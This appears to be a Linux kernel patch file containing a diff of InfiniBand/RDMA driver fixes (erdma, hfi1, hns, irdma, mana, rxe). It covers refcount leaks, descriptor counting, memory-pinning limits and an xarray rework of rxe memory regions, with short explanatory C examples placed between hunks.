+--- a/drivers/infiniband/hw/erdma/erdma_verbs.c
++++ b/drivers/infiniband/hw/erdma/erdma_verbs.c
+@@ -1110,12 +1110,14 @@ int erdma_mmap(struct ib_ucontext *ctx, struct vm_area_struct *vma)
+ 		prot = pgprot_device(vma->vm_page_prot);
+ 		break;
+ 	default:
+-		return -EINVAL;
++		err = -EINVAL;
++		goto put_entry;
+ 	}
+ 
+ 	err = rdma_user_mmap_io(ctx, vma, PFN_DOWN(entry->address), PAGE_SIZE,
+ 				prot, rdma_entry);
+ 
++put_entry:
+ 	rdma_user_mmap_entry_put(rdma_entry);
+ 	return err;
+ }
+diff --git a/drivers/infiniband/hw/hfi1/sdma.c b/drivers/infiniband/hw/hfi1/sdma.c
+index a95b654f52540..8ed20392e9f0d 100644
+--- a/drivers/infiniband/hw/hfi1/sdma.c
++++ b/drivers/infiniband/hw/hfi1/sdma.c
+@@ -3160,8 +3160,7 @@ int _pad_sdma_tx_descs(struct hfi1_devdata *dd, struct sdma_txreq *tx)
+ {
+ 	int rval = 0;
+ 
+-	tx->num_desc++;
+-	if ((unlikely(tx->num_desc == tx->desc_limit))) {
++	if ((unlikely(tx->num_desc + 1 == tx->desc_limit))) {
+ 		rval = _extend_sdma_tx_descs(dd, tx);
+ 		if (rval) {
+ 			__sdma_txclean(dd, tx);
+@@ -3174,6 +3173,7 @@ int _pad_sdma_tx_descs(struct hfi1_devdata *dd, struct sdma_txreq *tx)
+ 		SDMA_MAP_NONE,
+ 		dd->sdma_pad_phys,
+ 		sizeof(u32) - (tx->packet_len & (sizeof(u32) - 1)));
++	tx->num_desc++;
+ 	_sdma_close_tx(dd, tx);
+ 	return rval;
+ }
+diff --git a/drivers/infiniband/hw/hfi1/sdma.h b/drivers/infiniband/hw/hfi1/sdma.h
+index d8170fcbfbdd5..b023fc461bd51 100644
+--- a/drivers/infiniband/hw/hfi1/sdma.h
++++ b/drivers/infiniband/hw/hfi1/sdma.h
+@@ -631,14 +631,13 @@ static inline void sdma_txclean(struct hfi1_devdata *dd, struct sdma_txreq *tx)
+ static inline void _sdma_close_tx(struct hfi1_devdata *dd,
+ 				  struct sdma_txreq *tx)
+ {
+-	tx->descp[tx->num_desc].qw[0] |=
+-		SDMA_DESC0_LAST_DESC_FLAG;
+-	tx->descp[tx->num_desc].qw[1] |=
+-		dd->default_desc1;
++	u16 last_desc = tx->num_desc - 1;
++
++	tx->descp[last_desc].qw[0] |= SDMA_DESC0_LAST_DESC_FLAG;
++	tx->descp[last_desc].qw[1] |= dd->default_desc1;
+ 	if (tx->flags & SDMA_TXREQ_F_URGENT)
+-		tx->descp[tx->num_desc].qw[1] |=
+-			(SDMA_DESC1_HEAD_TO_HOST_FLAG |
+-			 SDMA_DESC1_INT_REQ_FLAG);
++		tx->descp[last_desc].qw[1] |= (SDMA_DESC1_HEAD_TO_HOST_FLAG |
++					       SDMA_DESC1_INT_REQ_FLAG);
+ }
+ 
+ static inline int _sdma_txadd_daddr(
+@@ -655,6 +654,7 @@ static inline int _sdma_txadd_daddr(
+ 		type,
+ 		addr, len);
+ 	WARN_ON(len > tx->tlen);
++	tx->num_desc++;
+ 	tx->tlen -= len;
+ 	/* special cases for last */
+ 	if (!tx->tlen) {
+@@ -666,7 +666,6 @@ static inline int _sdma_txadd_daddr(
+ 			_sdma_close_tx(dd, tx);
+ 		}
+ 	}
+-	tx->num_desc++;
+ 	return rval;
+ }
+ 
+diff --git a/drivers/infiniband/hw/hfi1/user_pages.c b/drivers/infiniband/hw/hfi1/user_pages.c
+index 7bce963e2ae69..36aaedc651456 100644
+--- a/drivers/infiniband/hw/hfi1/user_pages.c
++++ b/drivers/infiniband/hw/hfi1/user_pages.c
+@@ -29,33 +29,52 @@ MODULE_PARM_DESC(cache_size, "Send and receive side cache size limit (in MB)");
+ bool hfi1_can_pin_pages(struct hfi1_devdata *dd, struct mm_struct *mm,
+ 			u32 nlocked, u32 npages)
+ {
+-	unsigned long ulimit = rlimit(RLIMIT_MEMLOCK), pinned, cache_limit,
+-		size = (cache_size * (1UL << 20)); /* convert to bytes */
+-	unsigned int usr_ctxts =
+-			dd->num_rcv_contexts - dd->first_dyn_alloc_ctxt;
+-	bool can_lock = capable(CAP_IPC_LOCK);
++	unsigned long ulimit_pages;
++	unsigned long cache_limit_pages;
++	unsigned int usr_ctxts;
+ 
+ 	/*
+-	 * Calculate per-cache size. The calculation below uses only a quarter
+-	 * of the available per-context limit. This leaves space for other
+-	 * pinning. Should we worry about shared ctxts?
++	 * Perform RLIMIT_MEMLOCK based checks unless CAP_IPC_LOCK is present.
+ 	 */
+-	cache_limit = (ulimit / usr_ctxts) / 4;
+-
+-	/* If ulimit isn't set to "unlimited" and is smaller than cache_size. */
+-	if (ulimit != (-1UL) && size > cache_limit)
+-		size = cache_limit;
+-
+-	/* Convert to number of pages */
+-	size = DIV_ROUND_UP(size, PAGE_SIZE);
+-
+-	pinned = atomic64_read(&mm->pinned_vm);
++	if (!capable(CAP_IPC_LOCK)) {
++		ulimit_pages =
++			DIV_ROUND_DOWN_ULL(rlimit(RLIMIT_MEMLOCK), PAGE_SIZE);
++
++		/*
++		 * Pinning these pages would exceed this process's locked memory
++		 * limit.
++		 */
++		if (atomic64_read(&mm->pinned_vm) + npages > ulimit_pages)
++			return false;
++
++		/*
++		 * Only allow 1/4 of the user's RLIMIT_MEMLOCK to be used for HFI
++		 * caches.  This fraction is then equally distributed among all
++		 * existing user contexts.  Note that if RLIMIT_MEMLOCK is
++		 * 'unlimited' (-1), the value of this limit will be > 2^42 pages
++		 * (2^64 / 2^12 / 2^8 / 2^2).
++		 *
++		 * The effectiveness of this check may be reduced if I/O occurs on
++		 * some user contexts before all user contexts are created.  This
++		 * check assumes that this process is the only one using this
++		 * context (e.g., the corresponding fd was not passed to another
++		 * process for concurrent access) as there is no per-context,
++		 * per-process tracking of pinned pages.  It also assumes that each
++		 * user context has only one cache to limit.
++		 */
++		usr_ctxts = dd->num_rcv_contexts - dd->first_dyn_alloc_ctxt;
++		if (nlocked + npages > (ulimit_pages / usr_ctxts / 4))
++			return false;
++	}
+ 
+-	/* First, check the absolute limit against all pinned pages. */
+-	if (pinned + npages >= ulimit && !can_lock)
++	/*
++	 * Pinning these pages would exceed the size limit for this cache.
++	 */
++	cache_limit_pages = cache_size * (1024 * 1024) / PAGE_SIZE;
++	if (nlocked + npages > cache_limit_pages)
+ 		return false;
+ 
+-	return ((nlocked + npages) <= size) || can_lock;
++	return true;
+ }
+ 
+ int hfi1_acquire_user_pages(struct mm_struct *mm, unsigned long vaddr, size_t npages,
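
hfi1_can_pin_pages() above now works in pages end to end: unprivileged callers must stay under RLIMIT_MEMLOCK process-wide, each user context gets at most a quarter of that limit split evenly across contexts, and the cache-size cap applies regardless. The per-context check, worked with hypothetical numbers:

#include <stdbool.h>
#include <stdio.h>

int main(void)
{
	unsigned long ulimit_pages = 16384;	/* e.g. 64 MiB of 4 KiB pages */
	unsigned int usr_ctxts = 4;
	unsigned long nlocked = 900, npages = 200;

	unsigned long per_ctx_cap = ulimit_pages / usr_ctxts / 4;	/* 1024 */
	bool rejected = nlocked + npages > per_ctx_cap;

	printf("cap=%lu request=%lu -> %s\n", per_ctx_cap, nlocked + npages,
	       rejected ? "rejected" : "allowed");	/* 1100 > 1024: rejected */
	return 0;
}
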
+diff --git a/drivers/infiniband/hw/hns/hns_roce_main.c b/drivers/infiniband/hw/hns/hns_roce_main.c
+index 8ba68ac12388d..946ba1109e878 100644
+--- a/drivers/infiniband/hw/hns/hns_roce_main.c
++++ b/drivers/infiniband/hw/hns/hns_roce_main.c
+@@ -443,14 +443,15 @@ static int hns_roce_mmap(struct ib_ucontext *uctx, struct vm_area_struct *vma)
+ 		prot = pgprot_device(vma->vm_page_prot);
+ 		break;
+ 	default:
+-		return -EINVAL;
++		ret = -EINVAL;
++		goto out;
+ 	}
+ 
+ 	ret = rdma_user_mmap_io(uctx, vma, pfn, rdma_entry->npages * PAGE_SIZE,
+ 				prot, rdma_entry);
+ 
++out:
+ 	rdma_user_mmap_entry_put(rdma_entry);
+-
+ 	return ret;
+ }
+ 
+diff --git a/drivers/infiniband/hw/irdma/hw.c b/drivers/infiniband/hw/irdma/hw.c
+index ab246447520bd..2e1e2bad04011 100644
+--- a/drivers/infiniband/hw/irdma/hw.c
++++ b/drivers/infiniband/hw/irdma/hw.c
+@@ -483,6 +483,8 @@ static int irdma_save_msix_info(struct irdma_pci_f *rf)
+ 	iw_qvlist->num_vectors = rf->msix_count;
+ 	if (rf->msix_count <= num_online_cpus())
+ 		rf->msix_shared = true;
++	else if (rf->msix_count > num_online_cpus() + 1)
++		rf->msix_count = num_online_cpus() + 1;
+ 
+ 	pmsix = rf->msix_entries;
+ 	for (i = 0, ceq_idx = 0; i < rf->msix_count; i++, iw_qvinfo++) {
+diff --git a/drivers/infiniband/hw/mana/main.c b/drivers/infiniband/hw/mana/main.c
+index 8b3bc302d6f3a..7be4c3adb4e2b 100644
+--- a/drivers/infiniband/hw/mana/main.c
++++ b/drivers/infiniband/hw/mana/main.c
+@@ -249,7 +249,8 @@ static int
+ mana_ib_gd_first_dma_region(struct mana_ib_dev *dev,
+ 			    struct gdma_context *gc,
+ 			    struct gdma_create_dma_region_req *create_req,
+-			    size_t num_pages, mana_handle_t *gdma_region)
++			    size_t num_pages, mana_handle_t *gdma_region,
++			    u32 expected_status)
+ {
+ 	struct gdma_create_dma_region_resp create_resp = {};
+ 	unsigned int create_req_msg_size;
+@@ -261,7 +262,7 @@ mana_ib_gd_first_dma_region(struct mana_ib_dev *dev,
+ 
+ 	err = mana_gd_send_request(gc, create_req_msg_size, create_req,
+ 				   sizeof(create_resp), &create_resp);
+-	if (err || create_resp.hdr.status) {
++	if (err || create_resp.hdr.status != expected_status) {
+ 		ibdev_dbg(&dev->ib_dev,
+ 			  "Failed to create DMA region: %d, 0x%x\n",
+ 			  err, create_resp.hdr.status);
+@@ -372,14 +373,21 @@ int mana_ib_gd_create_dma_region(struct mana_ib_dev *dev, struct ib_umem *umem,
+ 
+ 	page_addr_list = create_req->page_addr_list;
+ 	rdma_umem_for_each_dma_block(umem, &biter, page_sz) {
++		u32 expected_status = 0;
++
+ 		page_addr_list[tail++] = rdma_block_iter_dma_address(&biter);
+ 		if (tail < num_pages_to_handle)
+ 			continue;
+ 
++		if (num_pages_processed + num_pages_to_handle <
++		    num_pages_total)
++			expected_status = GDMA_STATUS_MORE_ENTRIES;
++
+ 		if (!num_pages_processed) {
+ 			/* First create message */
+ 			err = mana_ib_gd_first_dma_region(dev, gc, create_req,
+-							  tail, gdma_region);
++							  tail, gdma_region,
++							  expected_status);
+ 			if (err)
+ 				goto out;
+ 
+@@ -392,14 +400,8 @@ int mana_ib_gd_create_dma_region(struct mana_ib_dev *dev, struct ib_umem *umem,
+ 			page_addr_list = add_req->page_addr_list;
+ 		} else {
+ 			/* Subsequent create messages */
+-			u32 expected_s = 0;
+-
+-			if (num_pages_processed + num_pages_to_handle <
+-			    num_pages_total)
+-				expected_s = GDMA_STATUS_MORE_ENTRIES;
+-
+ 			err = mana_ib_gd_add_dma_region(dev, gc, add_req, tail,
+-							expected_s);
++							expected_status);
+ 			if (err)
+ 				break;
+ 		}
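
The mana hunks above compute the expected completion status once per chunk, for the first create message as well as the follow-ups: any message that is not the final one should report GDMA_STATUS_MORE_ENTRIES. The chunking logic in isolation, with hypothetical page counts:

#include <stdio.h>

int main(void)
{
	unsigned int total = 10, per_msg = 4, processed = 0;

	while (processed < total) {
		unsigned int n = total - processed < per_msg ?
				 total - processed : per_msg;
		/* every message except the last expects "more entries" */
		int expect_more = processed + n < total;

		printf("send %u pages, expect_more=%d\n", n, expect_more);
		processed += n;
	}
	return 0;
}
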
+diff --git a/drivers/infiniband/sw/rxe/rxe.h b/drivers/infiniband/sw/rxe/rxe.h
+index ab334900fcc3d..2415f3704f576 100644
+--- a/drivers/infiniband/sw/rxe/rxe.h
++++ b/drivers/infiniband/sw/rxe/rxe.h
+@@ -57,6 +57,44 @@
+ #define rxe_dbg_mw(mw, fmt, ...) ibdev_dbg((mw)->ibmw.device,		\
+ 		"mw#%d %s:  " fmt, (mw)->elem.index, __func__, ##__VA_ARGS__)
+ 
++/* responder states */
++enum resp_states {
++	RESPST_NONE,
++	RESPST_GET_REQ,
++	RESPST_CHK_PSN,
++	RESPST_CHK_OP_SEQ,
++	RESPST_CHK_OP_VALID,
++	RESPST_CHK_RESOURCE,
++	RESPST_CHK_LENGTH,
++	RESPST_CHK_RKEY,
++	RESPST_EXECUTE,
++	RESPST_READ_REPLY,
++	RESPST_ATOMIC_REPLY,
++	RESPST_ATOMIC_WRITE_REPLY,
++	RESPST_PROCESS_FLUSH,
++	RESPST_COMPLETE,
++	RESPST_ACKNOWLEDGE,
++	RESPST_CLEANUP,
++	RESPST_DUPLICATE_REQUEST,
++	RESPST_ERR_MALFORMED_WQE,
++	RESPST_ERR_UNSUPPORTED_OPCODE,
++	RESPST_ERR_MISALIGNED_ATOMIC,
++	RESPST_ERR_PSN_OUT_OF_SEQ,
++	RESPST_ERR_MISSING_OPCODE_FIRST,
++	RESPST_ERR_MISSING_OPCODE_LAST_C,
++	RESPST_ERR_MISSING_OPCODE_LAST_D1E,
++	RESPST_ERR_TOO_MANY_RDMA_ATM_REQ,
++	RESPST_ERR_RNR,
++	RESPST_ERR_RKEY_VIOLATION,
++	RESPST_ERR_INVALIDATE_RKEY,
++	RESPST_ERR_LENGTH,
++	RESPST_ERR_CQ_OVERFLOW,
++	RESPST_ERROR,
++	RESPST_RESET,
++	RESPST_DONE,
++	RESPST_EXIT,
++};
++
+ void rxe_set_mtu(struct rxe_dev *rxe, unsigned int dev_mtu);
+ 
+ int rxe_add(struct rxe_dev *rxe, unsigned int mtu, const char *ibdev_name);
+diff --git a/drivers/infiniband/sw/rxe/rxe_loc.h b/drivers/infiniband/sw/rxe/rxe_loc.h
+index 948ce4902b10f..1bb0cb479eb12 100644
+--- a/drivers/infiniband/sw/rxe/rxe_loc.h
++++ b/drivers/infiniband/sw/rxe/rxe_loc.h
+@@ -64,12 +64,16 @@ void rxe_mr_init_dma(int access, struct rxe_mr *mr);
+ int rxe_mr_init_user(struct rxe_dev *rxe, u64 start, u64 length, u64 iova,
+ 		     int access, struct rxe_mr *mr);
+ int rxe_mr_init_fast(int max_pages, struct rxe_mr *mr);
+-int rxe_flush_pmem_iova(struct rxe_mr *mr, u64 iova, int length);
+-int rxe_mr_copy(struct rxe_mr *mr, u64 iova, void *addr, int length,
+-		enum rxe_mr_copy_dir dir);
++int rxe_flush_pmem_iova(struct rxe_mr *mr, u64 iova, unsigned int length);
++int rxe_mr_copy(struct rxe_mr *mr, u64 iova, void *addr,
++		unsigned int length, enum rxe_mr_copy_dir dir);
+ int copy_data(struct rxe_pd *pd, int access, struct rxe_dma_info *dma,
+ 	      void *addr, int length, enum rxe_mr_copy_dir dir);
+-void *iova_to_vaddr(struct rxe_mr *mr, u64 iova, int length);
++int rxe_map_mr_sg(struct ib_mr *ibmr, struct scatterlist *sg,
++		  int sg_nents, unsigned int *sg_offset);
++int rxe_mr_do_atomic_op(struct rxe_mr *mr, u64 iova, int opcode,
++			u64 compare, u64 swap_add, u64 *orig_val);
++int rxe_mr_do_atomic_write(struct rxe_mr *mr, u64 iova, u64 value);
+ struct rxe_mr *lookup_mr(struct rxe_pd *pd, int access, u32 key,
+ 			 enum rxe_mr_lookup_type type);
+ int mr_check_range(struct rxe_mr *mr, u64 iova, size_t length);
+diff --git a/drivers/infiniband/sw/rxe/rxe_mr.c b/drivers/infiniband/sw/rxe/rxe_mr.c
+index 072eac4b65d29..5e9a03831bf9f 100644
+--- a/drivers/infiniband/sw/rxe/rxe_mr.c
++++ b/drivers/infiniband/sw/rxe/rxe_mr.c
+@@ -26,22 +26,22 @@ u8 rxe_get_next_key(u32 last_key)
+ 
+ int mr_check_range(struct rxe_mr *mr, u64 iova, size_t length)
+ {
+-
+-
+ 	switch (mr->ibmr.type) {
+ 	case IB_MR_TYPE_DMA:
+ 		return 0;
+ 
+ 	case IB_MR_TYPE_USER:
+ 	case IB_MR_TYPE_MEM_REG:
+-		if (iova < mr->ibmr.iova || length > mr->ibmr.length ||
+-		    iova > mr->ibmr.iova + mr->ibmr.length - length)
+-			return -EFAULT;
++		if (iova < mr->ibmr.iova ||
++		    iova + length > mr->ibmr.iova + mr->ibmr.length) {
++			rxe_dbg_mr(mr, "iova/length out of range");
++			return -EINVAL;
++		}
+ 		return 0;
+ 
+ 	default:
+-		rxe_dbg_mr(mr, "type (%d) not supported\n", mr->ibmr.type);
+-		return -EFAULT;
++		rxe_dbg_mr(mr, "mr type not supported\n");
++		return -EINVAL;
+ 	}
+ }
+ 
+@@ -62,57 +62,31 @@ static void rxe_mr_init(int access, struct rxe_mr *mr)
+ 	mr->lkey = mr->ibmr.lkey = lkey;
+ 	mr->rkey = mr->ibmr.rkey = rkey;
+ 
++	mr->access = access;
++	mr->ibmr.page_size = PAGE_SIZE;
++	mr->page_mask = PAGE_MASK;
++	mr->page_shift = PAGE_SHIFT;
+ 	mr->state = RXE_MR_STATE_INVALID;
+ }
+ 
+-static int rxe_mr_alloc(struct rxe_mr *mr, int num_buf)
+-{
+-	int i;
+-	int num_map;
+-	struct rxe_map **map = mr->map;
+-
+-	num_map = (num_buf + RXE_BUF_PER_MAP - 1) / RXE_BUF_PER_MAP;
+-
+-	mr->map = kmalloc_array(num_map, sizeof(*map), GFP_KERNEL);
+-	if (!mr->map)
+-		goto err1;
+-
+-	for (i = 0; i < num_map; i++) {
+-		mr->map[i] = kmalloc(sizeof(**map), GFP_KERNEL);
+-		if (!mr->map[i])
+-			goto err2;
+-	}
+-
+-	BUILD_BUG_ON(!is_power_of_2(RXE_BUF_PER_MAP));
+-
+-	mr->map_shift = ilog2(RXE_BUF_PER_MAP);
+-	mr->map_mask = RXE_BUF_PER_MAP - 1;
+-
+-	mr->num_buf = num_buf;
+-	mr->num_map = num_map;
+-	mr->max_buf = num_map * RXE_BUF_PER_MAP;
+-
+-	return 0;
+-
+-err2:
+-	for (i--; i >= 0; i--)
+-		kfree(mr->map[i]);
+-
+-	kfree(mr->map);
+-	mr->map = NULL;
+-err1:
+-	return -ENOMEM;
+-}
+-
+ void rxe_mr_init_dma(int access, struct rxe_mr *mr)
+ {
+ 	rxe_mr_init(access, mr);
+ 
+-	mr->access = access;
+ 	mr->state = RXE_MR_STATE_VALID;
+ 	mr->ibmr.type = IB_MR_TYPE_DMA;
+ }
+ 
++static unsigned long rxe_mr_iova_to_index(struct rxe_mr *mr, u64 iova)
++{
++	return (iova >> mr->page_shift) - (mr->ibmr.iova >> mr->page_shift);
++}
++
++static unsigned long rxe_mr_iova_to_page_offset(struct rxe_mr *mr, u64 iova)
++{
++	return iova & (mr_page_size(mr) - 1);
++}
++
+ static bool is_pmem_page(struct page *pg)
+ {
+ 	unsigned long paddr = page_to_phys(pg);
+@@ -122,86 +96,98 @@ static bool is_pmem_page(struct page *pg)
+ 				 IORES_DESC_PERSISTENT_MEMORY);
+ }
+ 
++static int rxe_mr_fill_pages_from_sgt(struct rxe_mr *mr, struct sg_table *sgt)
++{
++	XA_STATE(xas, &mr->page_list, 0);
++	struct sg_page_iter sg_iter;
++	struct page *page;
++	bool persistent = !!(mr->access & IB_ACCESS_FLUSH_PERSISTENT);
++
++	__sg_page_iter_start(&sg_iter, sgt->sgl, sgt->orig_nents, 0);
++	if (!__sg_page_iter_next(&sg_iter))
++		return 0;
++
++	do {
++		xas_lock(&xas);
++		while (true) {
++			page = sg_page_iter_page(&sg_iter);
++
++			if (persistent && !is_pmem_page(page)) {
++				rxe_dbg_mr(mr, "Page can't be persistent\n");
++				xas_set_err(&xas, -EINVAL);
++				break;
++			}
++
++			xas_store(&xas, page);
++			if (xas_error(&xas))
++				break;
++			xas_next(&xas);
++			if (!__sg_page_iter_next(&sg_iter))
++				break;
++		}
++		xas_unlock(&xas);
++	} while (xas_nomem(&xas, GFP_KERNEL));
++
++	return xas_error(&xas);
++}
++
+ int rxe_mr_init_user(struct rxe_dev *rxe, u64 start, u64 length, u64 iova,
+ 		     int access, struct rxe_mr *mr)
+ {
+-	struct rxe_map		**map;
+-	struct rxe_phys_buf	*buf = NULL;
+-	struct ib_umem		*umem;
+-	struct sg_page_iter	sg_iter;
+-	int			num_buf;
+-	void			*vaddr;
++	struct ib_umem *umem;
+ 	int err;
+ 
++	rxe_mr_init(access, mr);
++
++	xa_init(&mr->page_list);
++
+ 	umem = ib_umem_get(&rxe->ib_dev, start, length, access);
+ 	if (IS_ERR(umem)) {
+ 		rxe_dbg_mr(mr, "Unable to pin memory region err = %d\n",
+ 			(int)PTR_ERR(umem));
+-		err = PTR_ERR(umem);
+-		goto err_out;
++		return PTR_ERR(umem);
+ 	}
+ 
+-	num_buf = ib_umem_num_pages(umem);
+-
+-	rxe_mr_init(access, mr);
+-
+-	err = rxe_mr_alloc(mr, num_buf);
++	err = rxe_mr_fill_pages_from_sgt(mr, &umem->sgt_append.sgt);
+ 	if (err) {
+-		rxe_dbg_mr(mr, "Unable to allocate memory for map\n");
+-		goto err_release_umem;
++		ib_umem_release(umem);
++		return err;
+ 	}
+ 
+-	mr->page_shift = PAGE_SHIFT;
+-	mr->page_mask = PAGE_SIZE - 1;
+-
+-	num_buf			= 0;
+-	map = mr->map;
+-	if (length > 0) {
+-		bool persistent_access = access & IB_ACCESS_FLUSH_PERSISTENT;
+-
+-		buf = map[0]->buf;
+-		for_each_sgtable_page (&umem->sgt_append.sgt, &sg_iter, 0) {
+-			struct page *pg = sg_page_iter_page(&sg_iter);
++	mr->umem = umem;
++	mr->ibmr.type = IB_MR_TYPE_USER;
++	mr->state = RXE_MR_STATE_VALID;
+ 
+-			if (persistent_access && !is_pmem_page(pg)) {
+-				rxe_dbg_mr(mr, "Unable to register persistent access to non-pmem device\n");
+-				err = -EINVAL;
+-				goto err_release_umem;
+-			}
++	return 0;
++}
+ 
+-			if (num_buf >= RXE_BUF_PER_MAP) {
+-				map++;
+-				buf = map[0]->buf;
+-				num_buf = 0;
+-			}
++static int rxe_mr_alloc(struct rxe_mr *mr, int num_buf)
++{
++	XA_STATE(xas, &mr->page_list, 0);
++	int i = 0;
++	int err;
+ 
+-			vaddr = page_address(pg);
+-			if (!vaddr) {
+-				rxe_dbg_mr(mr, "Unable to get virtual address\n");
+-				err = -ENOMEM;
+-				goto err_release_umem;
+-			}
+-			buf->addr = (uintptr_t)vaddr;
+-			buf->size = PAGE_SIZE;
+-			num_buf++;
+-			buf++;
++	xa_init(&mr->page_list);
+ 
++	do {
++		xas_lock(&xas);
++		while (i != num_buf) {
++			xas_store(&xas, XA_ZERO_ENTRY);
++			if (xas_error(&xas))
++				break;
++			xas_next(&xas);
++			i++;
+ 		}
+-	}
++		xas_unlock(&xas);
++	} while (xas_nomem(&xas, GFP_KERNEL));
+ 
+-	mr->umem = umem;
+-	mr->access = access;
+-	mr->offset = ib_umem_offset(umem);
+-	mr->state = RXE_MR_STATE_VALID;
+-	mr->ibmr.type = IB_MR_TYPE_USER;
+-	mr->ibmr.page_size = PAGE_SIZE;
++	err = xas_error(&xas);
++	if (err)
++		return err;
+ 
+-	return 0;
++	mr->num_buf = num_buf;
+ 
+-err_release_umem:
+-	ib_umem_release(umem);
+-err_out:
+-	return err;
++	return 0;
+ }
+ 
+ int rxe_mr_init_fast(int max_pages, struct rxe_mr *mr)
+@@ -215,7 +201,6 @@ int rxe_mr_init_fast(int max_pages, struct rxe_mr *mr)
+ 	if (err)
+ 		goto err1;
+ 
+-	mr->max_buf = max_pages;
+ 	mr->state = RXE_MR_STATE_FREE;
+ 	mr->ibmr.type = IB_MR_TYPE_MEM_REG;
+ 
+@@ -225,187 +210,125 @@ err1:
+ 	return err;
+ }
+ 
+-static void lookup_iova(struct rxe_mr *mr, u64 iova, int *m_out, int *n_out,
+-			size_t *offset_out)
++static int rxe_set_page(struct ib_mr *ibmr, u64 iova)
+ {
+-	size_t offset = iova - mr->ibmr.iova + mr->offset;
+-	int			map_index;
+-	int			buf_index;
+-	u64			length;
+-
+-	if (likely(mr->page_shift)) {
+-		*offset_out = offset & mr->page_mask;
+-		offset >>= mr->page_shift;
+-		*n_out = offset & mr->map_mask;
+-		*m_out = offset >> mr->map_shift;
+-	} else {
+-		map_index = 0;
+-		buf_index = 0;
++	struct rxe_mr *mr = to_rmr(ibmr);
++	struct page *page = virt_to_page(iova & mr->page_mask);
++	bool persistent = !!(mr->access & IB_ACCESS_FLUSH_PERSISTENT);
++	int err;
+ 
+-		length = mr->map[map_index]->buf[buf_index].size;
++	if (persistent && !is_pmem_page(page)) {
++		rxe_dbg_mr(mr, "Page cannot be persistent\n");
++		return -EINVAL;
++	}
+ 
+-		while (offset >= length) {
+-			offset -= length;
+-			buf_index++;
++	if (unlikely(mr->nbuf == mr->num_buf))
++		return -ENOMEM;
+ 
+-			if (buf_index == RXE_BUF_PER_MAP) {
+-				map_index++;
+-				buf_index = 0;
+-			}
+-			length = mr->map[map_index]->buf[buf_index].size;
+-		}
++	err = xa_err(xa_store(&mr->page_list, mr->nbuf, page, GFP_KERNEL));
++	if (err)
++		return err;
+ 
+-		*m_out = map_index;
+-		*n_out = buf_index;
+-		*offset_out = offset;
+-	}
++	mr->nbuf++;
++	return 0;
+ }
+ 
+-void *iova_to_vaddr(struct rxe_mr *mr, u64 iova, int length)
++int rxe_map_mr_sg(struct ib_mr *ibmr, struct scatterlist *sgl,
++		  int sg_nents, unsigned int *sg_offset)
+ {
+-	size_t offset;
+-	int m, n;
+-	void *addr;
+-
+-	if (mr->state != RXE_MR_STATE_VALID) {
+-		rxe_dbg_mr(mr, "Not in valid state\n");
+-		addr = NULL;
+-		goto out;
+-	}
+-
+-	if (!mr->map) {
+-		addr = (void *)(uintptr_t)iova;
+-		goto out;
+-	}
+-
+-	if (mr_check_range(mr, iova, length)) {
+-		rxe_dbg_mr(mr, "Range violation\n");
+-		addr = NULL;
+-		goto out;
+-	}
+-
+-	lookup_iova(mr, iova, &m, &n, &offset);
+-
+-	if (offset + length > mr->map[m]->buf[n].size) {
+-		rxe_dbg_mr(mr, "Crosses page boundary\n");
+-		addr = NULL;
+-		goto out;
+-	}
++	struct rxe_mr *mr = to_rmr(ibmr);
++	unsigned int page_size = mr_page_size(mr);
+ 
+-	addr = (void *)(uintptr_t)mr->map[m]->buf[n].addr + offset;
++	mr->nbuf = 0;
++	mr->page_shift = ilog2(page_size);
++	mr->page_mask = ~((u64)page_size - 1);
++	mr->page_offset = mr->ibmr.iova & (page_size - 1);
+ 
+-out:
+-	return addr;
++	return ib_sg_to_pages(ibmr, sgl, sg_nents, sg_offset, rxe_set_page);
+ }
+ 
+-int rxe_flush_pmem_iova(struct rxe_mr *mr, u64 iova, int length)
++static int rxe_mr_copy_xarray(struct rxe_mr *mr, u64 iova, void *addr,
++			      unsigned int length, enum rxe_mr_copy_dir dir)
+ {
+-	size_t offset;
++	unsigned int page_offset = rxe_mr_iova_to_page_offset(mr, iova);
++	unsigned long index = rxe_mr_iova_to_index(mr, iova);
++	unsigned int bytes;
++	struct page *page;
++	void *va;
+ 
+-	if (length == 0)
+-		return 0;
+-
+-	if (mr->ibmr.type == IB_MR_TYPE_DMA)
+-		return -EFAULT;
+-
+-	offset = (iova - mr->ibmr.iova + mr->offset) & mr->page_mask;
+-	while (length > 0) {
+-		u8 *va;
+-		int bytes;
+-
+-		bytes = mr->ibmr.page_size - offset;
+-		if (bytes > length)
+-			bytes = length;
+-
+-		va = iova_to_vaddr(mr, iova, length);
+-		if (!va)
++	while (length) {
++		page = xa_load(&mr->page_list, index);
++		if (!page)
+ 			return -EFAULT;
+ 
+-		arch_wb_cache_pmem(va, bytes);
+-
++		bytes = min_t(unsigned int, length,
++				mr_page_size(mr) - page_offset);
++		va = kmap_local_page(page);
++		if (dir == RXE_FROM_MR_OBJ)
++			memcpy(addr, va + page_offset, bytes);
++		else
++			memcpy(va + page_offset, addr, bytes);
++		kunmap_local(va);
++
++		page_offset = 0;
++		addr += bytes;
+ 		length -= bytes;
+-		iova += bytes;
+-		offset = 0;
++		index++;
+ 	}
+ 
+ 	return 0;
+ }
+ 
+-/* copy data from a range (vaddr, vaddr+length-1) to or from
+- * a mr object starting at iova.
+- */
+-int rxe_mr_copy(struct rxe_mr *mr, u64 iova, void *addr, int length,
+-		enum rxe_mr_copy_dir dir)
++static void rxe_mr_copy_dma(struct rxe_mr *mr, u64 iova, void *addr,
++			    unsigned int length, enum rxe_mr_copy_dir dir)
+ {
+-	int			err;
+-	int			bytes;
+-	u8			*va;
+-	struct rxe_map		**map;
+-	struct rxe_phys_buf	*buf;
+-	int			m;
+-	int			i;
+-	size_t			offset;
+-
+-	if (length == 0)
+-		return 0;
++	unsigned int page_offset = iova & (PAGE_SIZE - 1);
++	unsigned int bytes;
++	struct page *page;
++	u8 *va;
+ 
+-	if (mr->ibmr.type == IB_MR_TYPE_DMA) {
+-		u8 *src, *dest;
++	while (length) {
++		page = virt_to_page(iova & mr->page_mask);
++		bytes = min_t(unsigned int, length,
++				PAGE_SIZE - page_offset);
++		va = kmap_local_page(page);
++
++		if (dir == RXE_TO_MR_OBJ)
++			memcpy(va + page_offset, addr, bytes);
++		else
++			memcpy(addr, va + page_offset, bytes);
++
++		kunmap_local(va);
++		page_offset = 0;
++		iova += bytes;
++		addr += bytes;
++		length -= bytes;
++	}
++}
+ 
+-		src = (dir == RXE_TO_MR_OBJ) ? addr : ((void *)(uintptr_t)iova);
++int rxe_mr_copy(struct rxe_mr *mr, u64 iova, void *addr,
++		unsigned int length, enum rxe_mr_copy_dir dir)
++{
++	int err;
+ 
